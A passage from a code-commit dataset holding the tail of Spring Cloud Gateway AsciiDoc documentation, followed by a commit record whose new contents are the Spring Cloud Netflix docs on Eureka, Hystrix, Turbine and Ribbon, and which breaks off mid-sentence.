{\n\tFlux<RouteDefinition> getRouteDefinitions();\n}\n----\n\nBy default, a `PropertiesRouteDefinitionLocator` loads properties using Spring Boot's `@ConfigurationProperties` mechanism.\n\nThe configuration examples above all use a shortcut notation that uses positional arguments rather than named ones. The two examples below are equivalent:\n\n.application.yml\n[source,yaml]\n----\nspring:\n cloud:\n gateway:\n routes:\n # =====================================\n - id: setstatus_route\n uri: http:\/\/example.org\n filters:\n - name: SetStatus\n args:\n status: 401\n - id: setstatusshortcut_route\n uri: http:\/\/example.org\n filters:\n - SetStatus=401\n----\n\nFor some usages of the gateway, properties will be adequate, but some production use cases will benefit from loading configuration from an external source, such as a database. Future milestone versions will have `RouteDefinitionLocator` implementations based off of Spring Data Repositories such as: Redis, MongoDB and Cassandra.\n\n=== Fluent Java Routes API\nTo allow for simple configuration in Java, there is a fluent API defined in the `Routes` class.\n\n.Config.java\n[source,java]\n----\n\/\/ static imports from WebFilterFactories and RoutePredicates\n@Bean\npublic RouteLocator customRouteLocator(ThrottleWebFilterFactory throttle) {\n return Routes.locator()\n .route(\"test\")\n .uri(\"http:\/\/httpbin.org:80\")\n .predicate(host(\"**.abc.org\").and(path(\"\/image\/png\")))\n .addResponseHeader(\"X-TestHeader\", \"foobar\")\n .and()\n .route(\"test2\")\n .uri(\"http:\/\/httpbin.org:80\")\n .predicate(path(\"\/image\/webp\"))\n .add(addResponseHeader(\"X-AnotherHeader\", \"baz\"))\n .and()\n .build();\n}\n----\n\nThis style also allows for more custom predicate assertions. The predicates defined by `RouteDefinitionLocator` beans are combined using logical `and`. By using the fluent Java API, you can use the `and()`, `or()` and `negate()` operators on the `Predicate` class.\n\n== Actuator API\n\nTODO: document the `\/gateway` actuator endpoint\n\n== Developer Guide\n\nTODO: overview of writing custom integrations\n\n=== Writing Custom Route Predicate Factorys\n\nTODO: document writing Custom Route Predicate Factorys\n\n=== Writing Custom WebFilter Factorys\n\nTODO: document writing Custom WebFilter Factorys\n\n=== Writing Custom Global Filters\n\nTODO: document writing Custom Global Filters\n\n=== Writing Custom Route Locators and Writers\n\nTODO: document writing Custom Route Locators and Writers\n\n== Building a Simple Gateway Using Spring MVC\n\nSpring Cloud Gateway provides a utility object called `ProxyExchange` which you can use inside a regular Spring MVC handler as a method parameter. It supports basic downstream HTTP exchanges via methods that mirror the HTTP verbs, or forwarding to a local handler via the `forward()` method.\n\nExample (proxying a request to \"\/test\" downstream to a remote server):\n\n```java\n@RestController\n@SpringBootApplication\npublic class GatewaySampleApplication {\n\n\t@Value(\"${remote.home}\")\n\tprivate URI home;\n\n\t@GetMapping(\"\/test\")\n\tpublic ResponseEntity<?> proxy(ProxyExchange<Object> proxy) throws Exception {\n\t\treturn proxy.uri(home.toString() + \"\/image\/png\").get();\n\t}\n\n}\n```\n\nThere are convenience methods on the `ProxyExchange` to enable the handler method to discover and enhance the URI path of the incoming request. For example you might want to extract the trailing elements of a path to pass them downstream:\n\n```java\n@GetMapping(\"\/proxy\/path\/**\")\npublic ResponseEntity<?> proxyPath(ProxyExchange<?> proxy) throws Exception {\n String path = proxy.path(\"\/proxy\/path\/\");\n return proxy.uri(home.toString() + \"\/foos\/\" + path).get();\n}\n```\n\nAll the features of Spring MVC are available to Gateway handler methods. So you can inject request headers and query parameters, for instance, and you can constrain the incoming requests with declarations in the mapping annotation. See the documentation for `@RequestMapping` in Spring MVC for more details of those features.\n\nHeaders can be added to the downstream response using the `header()` methods on `ProxyExchange`.\n\nYou can also manipulate response headers (and anything else you like in the response) by adding a mapper to the `get()` etc. method. The mapper is a `Function` that takes the incoming `ResponseEntity` and converts it to an outgoing one.\n\nFirst class support is provided for \"sensitive\" headers (\"cookie\" and \"authorization\" by default) which are not passed downstream, and for \"proxy\" headers (`x-forwarded-*`).\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8cf581d4964bc67d1d4fa3a89cff8e63aa02697c","subject":"Correct description of cloud foundry instance id","message":"Correct description of cloud foundry instance id\n\nFixes gh-1214\n","repos":"joshiste\/spring-cloud-netflix,sfat\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,sfat\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,sfat\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,sfat\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,jkschneider\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,sfat\/spring-cloud-netflix","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_contents":":github-tag: master\n:github-repo: spring-cloud\/spring-cloud-netflix\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:all: {asterisk}{asterisk}\n= Spring Cloud Netflix\n\ninclude::intro.adoc[]\n\n== Service Discovery: Eureka Clients\n\nService Discovery is one of the key tenets of a microservice based architecture. Trying to hand configure each client or some form of convention can be very difficult to do and can be very brittle. Eureka is the Netflix Service Discovery Server and Client. The server can be configured and deployed to be highly available, with each server replicating state about the registered services to the others.\n\n=== Registering with Eureka\n\nWhen a client registers with Eureka, it provides meta-data about itself\nsuch as host and port, health indicator URL, home page etc. Eureka\nreceives heartbeat messages from each instance belonging to a service.\nIf the heartbeat fails over a configurable timetable, the instance is\nnormally removed from the registry.\n\nExample eureka client:\n\n[source,java,indent=0]\n----\n@Configuration\n@ComponentScan\n@EnableAutoConfiguration\n@EnableEurekaClient\n@RestController\npublic class Application {\n\n @RequestMapping(\"\/\")\n public String home() {\n return \"Hello world\";\n }\n\n public static void main(String[] args) {\n new SpringApplicationBuilder(Application.class).web(true).run(args);\n }\n\n}\n----\n\n(i.e. utterly normal Spring Boot app). In this example we use\n`@EnableEurekaClient` explicitly, but with only Eureka available you\ncould also use `@EnableDiscoveryClient`. Configuration is required to\nlocate the Eureka server. Example:\n\n\n.application.yml\n----\neureka:\n client:\n serviceUrl:\n defaultZone: http:\/\/localhost:8761\/eureka\/\n----\n\nwhere \"defaultZone\" is a magic string fallback value that provides the\nservice URL for any client that doesn't express a preference\n(i.e. it's a useful default).\n\nThe default application name (service ID), virtual host and non-secure\nport, taken from the `Environment`, are `${spring.application.name}`,\n`${spring.application.name}` and `${server.port}` respectively.\n\n`@EnableEurekaClient` makes the app into both a Eureka \"instance\"\n(i.e. it registers itself) and a \"client\" (i.e. it can query the\nregistry to locate other services). The instance behaviour is driven\nby `eureka.instance.*` configuration keys, but the defaults will be\nfine if you ensure that your application has a\n`spring.application.name` (this is the default for the Eureka service\nID, or VIP).\n\nSee {github-code}\/spring-cloud-netflix-eureka-client\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka\/EurekaInstanceConfigBean.java[EurekaInstanceConfigBean] and {github-code}\/spring-cloud-netflix-eureka-client\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka\/EurekaClientConfigBean.java[EurekaClientConfigBean] for more details of the configurable options.\n\n=== Authenticating with the Eureka Server\n\nHTTP basic authentication will be automatically added to your eureka\nclient if one of the `eureka.client.serviceUrl.defaultZone` URLs has\ncredentials embedded in it (curl style, like\n`http:\/\/user:password@localhost:8761\/eureka`). For more complex needs\nyou can create a `@Bean` of type `DiscoveryClientOptionalArgs` and\ninject `ClientFilter` instances into it, all of which will be applied\nto the calls from the client to the server.\n\nNOTE: Because of a limitation in Eureka it isn't possible to support\nper-server basic auth credentials, so only the first set that are\nfound will be used.\n\n=== Status Page and Health Indicator\n\nThe status page and health indicators for a Eureka instance default to\n\"\/info\" and \"\/health\" respectively, which are the default locations of\nuseful endpoints in a Spring Boot Actuator application. You need to\nchange these, even for an Actuator application if you use a\nnon-default context path or servlet path\n(e.g. `server.servletPath=\/foo`) or management endpoint path\n(e.g. `management.contextPath=\/admin`). Example:\n\n.application.yml\n----\neureka:\n instance:\n statusPageUrlPath: ${management.context-path}\/info\n healthCheckUrlPath: ${management.context-path}\/health\n----\n\nThese links show up in the metadata that is consumed by clients, and\nused in some scenarios to decide whether to send requests to your\napplication, so it's helpful if they are accurate.\n\n=== Registering a Secure Application\n\nIf your app wants to be contacted over HTTPS you can set two flags in\nthe `EurekaInstanceConfig`, _viz_\n`eureka.instance.[nonSecurePortEnabled,securePortEnabled]=[false,true]`\nrespectively. This will make Eureka publish instance information\nshowing an explicit preference for secure communication. The Spring\nCloud `DiscoveryClient` will always return an `https:\/\/...` URI for a\nservice configured this way, and the Eureka (native) instance\ninformation will have a secure health check URL. \n\nBecause of the way\nEureka works internally, it will still publish a non-secure URL for\nstatus and home page unless you also override those explicitly.\nYou can use placeholders to configure the eureka instance urls,\ne.g.\n\n.application.yml\n----\neureka:\n instance:\n statusPageUrl: https:\/\/${eureka.hostname}\/info\n healthCheckUrl: https:\/\/${eureka.hostname}\/health\n homePageUrl: https:\/\/${eureka.hostname}\/\n----\n\n(Note that `${eureka.hostname}` is a native placeholder only available\nin later versions of Eureka. You could achieve the same thing with\nSpring placeholders as well, e.g. using `${eureka.instance.hostName}`.)\n\nNOTE: If your app is running behind a proxy, and the SSL termination\nis in the proxy (e.g. if you run in Cloud Foundry or other platforms\nas a service) then you will need to ensure that the proxy \"forwarded\"\nheaders are intercepted and handled by the application. An embedded\nTomcat container in a Spring Boot app does this automatically if it\nhas explicit configuration for the 'X-Forwarded-\\*` headers. A sign\nthat you got this wrong will be that the links rendered by your app to\nitself will be wrong (the wrong host, port or protocol).\n\n=== Eureka's Health Checks\n\nBy default, Eureka uses the client heartbeat to determine if a client is up.\nUnless specified otherwise the Discovery Client will not propagate the\ncurrent health check status of the application per the Spring Boot Actuator. Which means\nthat after successful registration Eureka will always announce that the\napplication is in 'UP' state. This behaviour can be altered by enabling\nEureka health checks, which results in propagating application status\nto Eureka. As a consequence every other application won't be sending\ntraffic to application in state other then 'UP'.\n\n.application.yml\n----\neureka:\n client:\n healthcheck:\n enabled: true\n----\n\nIf you require more control over the health checks, you may consider\nimplementing your own `com.netflix.appinfo.HealthCheckHandler`.\n\n=== Eureka Metadata for Instances and Clients\n\nIt's worth spending a bit of time understanding how the Eureka metadata works, so you can use it in a way that makes sense in your platform. There is standard metadata for things like hostname, IP address, port numbers, status page and health check. These are published in the service registry and used by clients to contact the services in a straightforward way. Additional metadata can be added to the instance registration in the `eureka.instance.metadataMap`, and this will be accessible in the remote clients, but in general will not change the behaviour of the client, unless it is made aware of the meaning of the metadata. There are a couple of special cases described below where Spring Cloud already assigns meaning to the metadata map.\n\n==== Using Eureka on Cloudfoundry\n\nCloudfoundry has a global router so that all instances of the same app have the same hostname (it's the same in other PaaS solutions with a similar architecture). This isn't necessarily a barrier to using Eureka, but if you use the router (recommended, or even mandatory depending on the way your platform was set up), you need to explicitly set the hostname and port numbers (secure or non-secure) so that they use the router. You might also want to use instance metadata so you can distinguish between the instances on the client (e.g. in a custom load balancer). By default, the `eureka.instance.instanceId` is `vcap.application.instance_id`. For example:\n\n.application.yml\n----\neureka:\n instance:\n hostname: ${vcap.application.uris[0]}\n nonSecurePort: 80\n----\n\nDepending on the way the security rules are set up in your Cloudfoundry instance, you might be able to register and use the IP address of the host VM for direct service-to-service calls. This feature is not (yet) available on Pivotal Web Services (https:\/\/run.pivotal.io[PWS]).\n\n==== Using Eureka on AWS\n\nIf the application is planned to be deployed to an AWS cloud, then the Eureka instance will have to be configured to be Amazon aware and this can be done by customizing the {github-code}\/spring-cloud-netflix-eureka-client\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka\/EurekaInstanceConfigBean.java[EurekaInstanceConfigBean] the following way:\n\n[source,java,indent=0]\n----\n@Bean\n@Profile(\"!default\")\npublic EurekaInstanceConfigBean eurekaInstanceConfig() {\n EurekaInstanceConfigBean b = new EurekaInstanceConfigBean();\n AmazonInfo info = AmazonInfo.Builder.newBuilder().autoBuild(\"eureka\");\n b.setDataCenterInfo(info);\n return b;\n}\n----\n\n==== Changing the Eureka Instance ID\n\nA vanilla Netflix Eureka instance is registered with an ID that is equal to its host name (i.e. only one service per host). Spring Cloud Eureka provides a sensible default that looks like this: `${spring.cloud.client.hostname}:${spring.application.name}:${spring.application.instance_id:${server.port}}}`. For example `myhost:myappname:8080`.\n\nUsing Spring Cloud you can override this by providing a unique identifier in `eureka.instance.instanceId`. For example:\n\n.application.yml\n----\neureka:\n instance:\n instanceId: ${spring.application.name}:${vcap.application.instance_id:${spring.application.instance_id:${random.value}}}\n----\n\nWith this metadata, and multiple service instances deployed on\nlocalhost, the random value will kick in there to make the instance\nunique. In Cloudfoundry the `vcap.application.instance_id` will be\npopulated automatically in a Spring Boot application, so the\nrandom value will not be needed.\n\n=== Using the EurekaClient\n\nOnce you have an app that is `@EnableDiscoveryClient` (or `@EnableEurekaClient`) you can use it to\ndiscover service instances from the <<spring-cloud-eureka-server,\nEureka Server>>. One way to do that is to use the native\n`com.netflix.discovery.EurekaClient` (as opposed to the Spring\nCloud `DiscoveryClient`), e.g.\n\n----\n@Autowired\nprivate EurekaClient discoveryClient;\n\npublic String serviceUrl() {\n InstanceInfo instance = discoveryClient.getNextServerFromEureka(\"STORES\", false);\n return instance.getHomePageUrl();\n}\n----\n\n[TIP]\n====\nDon't use the `EurekaClient` in `@PostConstruct` method or in a\n`@Scheduled` method (or anywhere where the `ApplicationContext` might\nnot be started yet). It is initialized in a `SmartLifecycle` (with\n`phase=0`) so the earliest you can rely on it being available is in\nanother `SmartLifecycle` with higher phase.\n====\n\n=== Alternatives to the native Netflix EurekaClient\n\nYou don't have to use the raw Netflix `EurekaClient` and usually it\nis more convenient to use it behind a wrapper of some sort. Spring\nCloud has support for <<spring-cloud-feign, Feign>> (a REST client\nbuilder) and also <<spring-cloud-ribbon, Spring `RestTemplate`>> using\nthe logical Eureka service identifiers (VIPs) instead of physical\nURLs. To configure Ribbon with a fixed list of physical servers you\ncan simply set `<client>.ribbon.listOfServers` to a comma-separated\nlist of physical addresses (or hostnames), where `<client>` is the ID\nof the client.\n\nYou can also use the `org.springframework.cloud.client.discovery.DiscoveryClient`\nwhich provides a simple API for discovery clients that is not specific\nto Netflix, e.g.\n\n----\n@Autowired\nprivate DiscoveryClient discoveryClient;\n\npublic String serviceUrl() {\n List<ServiceInstance> list = discoveryClient.getInstances(\"STORES\");\n if (list != null && list.size() > 0 ) {\n return list.get(0).getUri();\n }\n return null;\n}\n----\n\n=== Why is it so Slow to Register a Service?\n\nBeing an instance also involves a periodic heartbeat to the registry\n(via the client's `serviceUrl`) with default duration 30 seconds. A\nservice is not available for discovery by clients until the instance,\nthe server and the client all have the same metadata in their local\ncache (so it could take 3 heartbeats). You can change the period using\n`eureka.instance.leaseRenewalIntervalInSeconds` and this will speed up\nthe process of getting clients connected to other services. In\nproduction it's probably better to stick with the default because\nthere are some computations internally in the server that make\nassumptions about the lease renewal period.\n\n[[spring-cloud-eureka-server]]\n== Service Discovery: Eureka Server\n\nExample eureka server (e.g. using spring-cloud-starter-eureka-server to set up the classpath):\n\n[source,java,indent=0]\n----\n@SpringBootApplication\n@EnableEurekaServer\npublic class Application {\n\n public static void main(String[] args) {\n new SpringApplicationBuilder(Application.class).web(true).run(args);\n }\n\n}\n----\n\nThe server has a home page with a UI, and HTTP API endpoints per the\nnormal Eureka functionality under `\/eureka\/*`.\n\nEureka background reading: see https:\/\/github.com\/cfregly\/fluxcapacitor\/wiki\/NetflixOSS-FAQ#eureka-service-discovery-load-balancer[flux capacitor] and https:\/\/groups.google.com\/forum\/?fromgroups#!topic\/eureka_netflix\/g3p2r7gHnN0[google group discussion].\n\n\n[TIP]\n====\nDue to Gradle's dependency resolution rules and the lack of a parent bom feature, simply depending on spring-cloud-starter-eureka-server can cause failures on application startup. To remedy this the Spring Boot Gradle plugin must be added and the Spring cloud starter parent bom must be imported like so:\n\n.build.gradle\n[source,java,indent=0]\n----\nbuildscript {\n dependencies {\n classpath(\"org.springframework.boot:spring-boot-gradle-plugin:1.3.5.RELEASE\")\n }\n}\n\napply plugin: \"spring-boot\"\n\ndependencyManagement {\n imports {\n mavenBom \"org.springframework.cloud:spring-cloud-dependencies:Brixton.RELEASE\"\n }\n}\n----\n====\n\n=== High Availability, Zones and Regions\n\nThe Eureka server does not have a backend store, but the service\ninstances in the registry all have to send heartbeats to keep their\nregistrations up to date (so this can be done in memory). Clients also\nhave an in-memory cache of eureka registrations (so they don't have to\ngo to the registry for every single request to a service).\n\nBy default every Eureka server is also a Eureka client and requires\n(at least one) service URL to locate a peer. If you don't provide it\nthe service will run and work, but it will shower your logs with a lot\nof noise about not being able to register with the peer.\n\nSee also <<spring-cloud-ribbon,below for details of Ribbon\nsupport>> on the client side for Zones and Regions.\n\n=== Standalone Mode\n\nThe combination of the two caches (client and server) and the\nheartbeats make a standalone Eureka server fairly resilient to\nfailure, as long as there is some sort of monitor or elastic runtime\nkeeping it alive (e.g. Cloud Foundry). In standalone mode, you might\nprefer to switch off the client side behaviour, so it doesn't keep\ntrying and failing to reach its peers. Example:\n\n.application.yml (Standalone Eureka Server)\n----\nserver:\n port: 8761\n\neureka:\n instance:\n hostname: localhost\n client:\n registerWithEureka: false\n fetchRegistry: false\n serviceUrl:\n defaultZone: http:\/\/${eureka.instance.hostname}:${server.port}\/eureka\/\n----\n\nNotice that the `serviceUrl` is pointing to the same host as the local\ninstance.\n\n=== Peer Awareness\n\nEureka can be made even more resilient and available by running\nmultiple instances and asking them to register with each other. In\nfact, this is the default behaviour, so all you need to do to make it\nwork is add a valid `serviceUrl` to a peer, e.g.\n\n.application.yml (Two Peer Aware Eureka Servers)\n----\n\n---\nspring:\n profiles: peer1\neureka:\n instance:\n hostname: peer1\n client:\n serviceUrl:\n defaultZone: http:\/\/peer2\/eureka\/\n\n---\nspring:\n profiles: peer2\neureka:\n instance:\n hostname: peer2\n client:\n serviceUrl:\n defaultZone: http:\/\/peer1\/eureka\/\n----\n\nIn this example we have a YAML file that can be used to run the same\nserver on 2 hosts (peer1 and peer2), by running it in different\nSpring profiles. You could use this configuration to test the peer\nawareness on a single host (there's not much value in doing that in\nproduction) by manipulating `\/etc\/hosts` to resolve the host names. In\nfact, the `eureka.instance.hostname` is not needed if you are running\non a machine that knows its own hostname (it is looked up using\n`java.net.InetAddress` by default).\n\nYou can add multiple peers to a system, and as long as they are all\nconnected to each other by at least one edge, they will synchronize\nthe registrations amongst themselves. If the peers are physically\nseparated (inside a data centre or between multiple data centres) then\nthe system can in principle survive split-brain type failures.\n\n=== Prefer IP Address\n\nIn some cases, it is preferable for Eureka to advertise the IP Adresses\nof services rather than the hostname. Set `eureka.instance.preferIpAddress`\nto `true` and when the application registers with eureka, it will use its\nIP Address rather than its hostname.\n\n== Circuit Breaker: Hystrix Clients\n\nNetflix has created a library called https:\/\/github.com\/Netflix\/Hystrix[Hystrix] that implements the http:\/\/martinfowler.com\/bliki\/CircuitBreaker.html[circuit breaker pattern]. In a microservice architecture it is common to have multiple layers of service calls.\n\n.Microservice Graph\nimage::HystrixGraph.png[]\n\nA service failure in the lower level of services can cause cascading failure all the way up to the user. When calls to a particular service reach a certain threshold (20 failures in 5 seconds is the default in Hystrix), the circuit opens and the call is not made. In cases of error and an open circuit a fallback can be provided by the developer.\n\n.Hystrix fallback prevents cascading failures\nimage::HystrixFallback.png[]\n\nHaving an open circuit stops cascading failures and allows overwhelmed or failing services time to heal. The fallback can be another Hystrix protected call, static data or a sane empty value. Fallbacks may be chained so the first fallback makes some other business call which in turn falls back to static data.\n\nExample boot app:\n\n----\n@SpringBootApplication\n@EnableCircuitBreaker\npublic class Application {\n\n public static void main(String[] args) {\n new SpringApplicationBuilder(Application.class).web(true).run(args);\n }\n\n}\n\n@Component\npublic class StoreIntegration {\n\n @HystrixCommand(fallbackMethod = \"defaultStores\")\n public Object getStores(Map<String, Object> parameters) {\n \/\/do stuff that might fail\n }\n\n public Object defaultStores(Map<String, Object> parameters) {\n return \/* something useful *\/;\n }\n}\n\n----\n\nThe `@HystrixCommand` is provided by a Netflix contrib library called\nhttps:\/\/github.com\/Netflix\/Hystrix\/tree\/master\/hystrix-contrib\/hystrix-javanica[\"javanica\"].\nSpring Cloud automatically wraps Spring beans with that\nannotation in a proxy that is connected to the Hystrix circuit\nbreaker. The circuit breaker calculates when to open and close the\ncircuit, and what to do in case of a failure.\n\nTo configure the `@HystrixCommand` you can use the `commandProperties`\nattribute with a list of `@HystrixProperty` annotations. See\nhttps:\/\/github.com\/Netflix\/Hystrix\/tree\/master\/hystrix-contrib\/hystrix-javanica#configuration[here]\nfor more details. See the https:\/\/github.com\/Netflix\/Hystrix\/wiki\/Configuration[Hystrix wiki]\nfor details on the properties available.\n\n=== Propagating the Security Context or using Spring Scopes\n\nIf you want some thread local context to propagate into a `@HystrixCommand` the default declaration will not work because it executes the command in a thread pool (in case of timeouts). You can switch Hystrix to use the same thread as the caller using some configuration, or directly in the annotation, by asking it to use a different \"Isolation Strategy\". For example:\n\n[source,java]\n----\n@HystrixCommand(fallbackMethod = \"stubMyService\",\n commandProperties = {\n @HystrixProperty(name=\"execution.isolation.strategy\", value=\"SEMAPHORE\")\n }\n)\n...\n----\n\nThe same thing applies if you are using `@SessionScope` or `@RequestScope`. You will know when you need to do this because of a runtime exception that says it can't find the scoped context.\n\n### Health Indicator\n\nThe state of the connected circuit breakers are also exposed in the\n`\/health` endpoint of the calling application.\n\n[source,json,indent=0]\n----\n{\n \"hystrix\": {\n \"openCircuitBreakers\": [\n \"StoreIntegration::getStoresByLocationLink\"\n ],\n \"status\": \"CIRCUIT_OPEN\"\n },\n \"status\": \"UP\"\n}\n----\n\n=== Hystrix Metrics Stream\n\nTo enable the Hystrix metrics stream include a dependency on `spring-boot-starter-actuator`. This will expose the `\/hystrix.stream` as a management endpoint.\n\n[source,xml]\n----\n <dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-actuator<\/artifactId>\n <\/dependency>\n----\n\n== Circuit Breaker: Hystrix Dashboard\n\nOne of the main benefits of Hystrix is the set of metrics it gathers about each HystrixCommand. The Hystrix Dashboard displays the health of each circuit breaker in an efficient manner.\n\n.Hystrix Dashboard\nimage::Hystrix.png[]\n\nTo run the Hystrix Dashboard annotate your Spring Boot main class with `@EnableHystrixDashboard`. You then visit `\/hystrix` and point the dashboard to an individual instances `\/hystrix.stream` endpoint in a Hystrix client application.\n\n=== Turbine\n\nLooking at an individual instances Hystrix data is not very useful in terms of the overall health of the system. https:\/\/github.com\/Netflix\/Turbine[Turbine] is an application that aggregates all of the relevant `\/hystrix.stream` endpoints into a combined `\/turbine.stream` for use in the Hystrix Dashboard. Individual instances are located via Eureka. Running Turbine is as simple as annotating your main class with the `@EnableTurbine` annotation (e.g. using spring-cloud-starter-turbine to set up the classpath). All of the documented configuration properties from https:\/\/github.com\/Netflix\/Turbine\/wiki\/Configuration-(1.x)[the Turbine 1 wiki] apply. The only difference is that the `turbine.instanceUrlSuffix` does not need the port prepended as this is handled automatically unless `turbine.instanceInsertPort=false`.\n\nThe configuration key `turbine.appConfig` is a list of eureka serviceIds that turbine will use to lookup instances. The turbine stream is then used in the Hystrix dashboard using a url that looks like: `http:\/\/my.turbine.sever:8080\/turbine.stream?cluster=<CLUSTERNAME>` (the cluster parameter can be omitted if the name is \"default\"). The `cluster` parameter must match an entry in `turbine.aggregator.clusterConfig`. Values returned from eureka are uppercase, thus we expect this example to work if there is an app registered with Eureka called \"customers\":\n\n----\nturbine:\n aggregator:\n clusterConfig: CUSTOMERS\n appConfig: customers\n----\n\nThe `clusterName` can be customized by a SPEL expression in `turbine.clusterNameExpression` with root an instance of `InstanceInfo`. The default value is `appName`, which means that the Eureka serviceId ends up as the cluster key (i.e. the `InstanceInfo` for customers has an `appName` of \"CUSTOMERS\"). A different example would be `turbine.clusterNameExpression=aSGName`, which would get the cluster name from the AWS ASG name. Another example:\n\n----\nturbine:\n aggregator:\n clusterConfig: SYSTEM,USER\n appConfig: customers,stores,ui,admin\n clusterNameExpression: metadata['cluster']\n----\n\nIn this case, the cluster name from 4 services is pulled from their metadata map, and is expected to have values that include \"SYSTEM\" and \"USER\".\n\nTo use the \"default\" cluster for all apps you need a string literal expression (with single quotes, and escaped with double quotes if it is in YAML as well):\n\n----\nturbine:\n appConfig: customers,stores\n clusterNameExpression: \"'default'\"\n----\n\nSpring Cloud provides a `spring-cloud-starter-turbine` that has all the dependencies you need to get a Turbine server running. Just create a Spring Boot application and annotate it with `@EnableTurbine`.\n\nNOTE: by default Spring Cloud allows Turbine to use the host and port to allow multiple processes per host, per cluster. If you want the native Netflix behaviour built into Turbine that does _not_ allow multiple processes per host, per cluster (the key to the instance id is the hostname), then set the property `turbine.combineHostPort=false`.\n\n=== Turbine Stream\n\nIn some environments (e.g. in a PaaS setting), the classic Turbine model of pulling metrics from all the distributed Hystrix commands doesn't work. In that case you might want to have your Hystrix commands push metrics to Turbine, and Spring Cloud enables that with messaging. All you need to do on the client is add a dependency to `spring-cloud-netflix-hystrix-stream` and the `spring-cloud-starter-stream-*` of your choice (see Spring Cloud Stream documentation for details on the brokers, and how to configure the client credentials, but it should work out of the box for a local broker).\n\nOn the server side Just create a Spring Boot application and annotate it with `@EnableTurbineStream` and by default it will come up on port 8989 (point your Hystrix dashboard to that port, any path). You can customize the port using either `server.port` or `turbine.stream.port`. If you have `spring-boot-starter-web` and `spring-boot-starter-actuator` on the classpath as well, then you can open up the Actuator endpoints on a separate port (with Tomcat by default) by providing a `management.port` which is different.\n\nYou can then point the Hystrix Dashboard to the Turbine Stream Server instead of individual Hystrix streams. If Turbine Stream is running on port 8989 on myhost, then put `http:\/\/myhost:8989` in the stream input field in the Hystrix Dashboard. Circuits will be prefixed by their respective serviceId, followed by a dot, then the circuit name.\n\nSpring Cloud provides a `spring-cloud-starter-turbine-stream` that has all the dependencies you need to get a Turbine Stream server running - just add the Stream binder of your choice, e.g. `spring-cloud-starter-stream-rabbit`. You need Java 8 to run the app because it is Netty-based.\n\n[[spring-cloud-ribbon]]\n== Client Side Load Balancer: Ribbon\n\nRibbon is a client side load balancer which gives you a lot of control\nover the behaviour of HTTP and TCP clients. Feign already uses Ribbon,\nso if you are using `@FeignClient` then this section also applies.\n\nA central concept in Ribbon is that of the named client. Each load\nbalancer is part of an ensemble of components that work together to\ncontact a remote server on demand, and the ensemble has a name that\nyou give it as an application developer (e.g. using the `@FeignClient`\nannotation). Spring Cloud creates a new ensemble as an\n`ApplicationContext` on demand for each named client using\n`RibbonClientConfiguration`. This contains (amongst other things) an\n`ILoadBalancer`, a `RestClient`, and a `ServerListFilter`.\n\n=== Customizing the Ribbon Client\n\nYou can configure some bits of a Ribbon client using external\nproperties in `<client>.ribbon.*`, which is no different than using\nthe Netflix APIs natively, except that you can use Spring Boot\nconfiguration files. The native options can\nbe inspected as static fields in `CommonClientConfigKey` (part of\nribbon-core).\n\nSpring Cloud also lets you take full control of the client by\ndeclaring additional configuration (on top of the\n`RibbonClientConfiguration`) using `@RibbonClient`. Example:\n\n[source,java,indent=0]\n----\n@Configuration\n@RibbonClient(name = \"foo\", configuration = FooConfiguration.class)\npublic class TestConfiguration {\n}\n----\n\nIn this case the client is composed from the components already in\n`RibbonClientConfiguration` together with any in `FooConfiguration`\n(where the latter generally will override the former).\n\nWARNING: The `FooConfiguration` has to be `@Configuration` but take\ncare that it is not in a `@ComponentScan` for the main application\ncontext, otherwise it will be shared by all the `@RibbonClients`. If\nyou use `@ComponentScan` (or `@SpringBootApplication`) you need to\ntake steps to avoid it being included (for instance put it in a\nseparate, non-overlapping package, or specify the packages to scan\nexplicitly in the `@ComponentScan`).\n\nSpring Cloud Netflix provides the following beans by default for ribbon\n(`BeanType` beanName: `ClassName`):\n\n* `IClientConfig` ribbonClientConfig: `DefaultClientConfigImpl`\n* `IRule` ribbonRule: `ZoneAvoidanceRule`\n* `IPing` ribbonPing: `NoOpPing`\n* `ServerList<Server>` ribbonServerList: `ConfigurationBasedServerList`\n* `ServerListFilter<Server>` ribbonServerListFilter: `ZonePreferenceServerListFilter`\n* `ILoadBalancer` ribbonLoadBalancer: `ZoneAwareLoadBalancer`\n\nCreating a bean of one of those type and placing it in a `@RibbonClient`\nconfiguration (such as `FooConfiguration` above) allows you to override each\none of the beans described. Example:\n\n[source,java,indent=0]\n----\n@Configuration\npublic class FooConfiguration {\n @Bean\n public IPing ribbonPing(IClientConfig config) {\n return new PingUrl();\n }\n}\n----\n\nThis replaces the `NoOpPing` with `PingUrl`.\n\n=== Using Ribbon with Eureka\n\nWhen Eureka is used in conjunction with Ribbon the `ribbonServerList`\nis overridden with an extension of `DiscoveryEnabledNIWSServerList`\nwhich 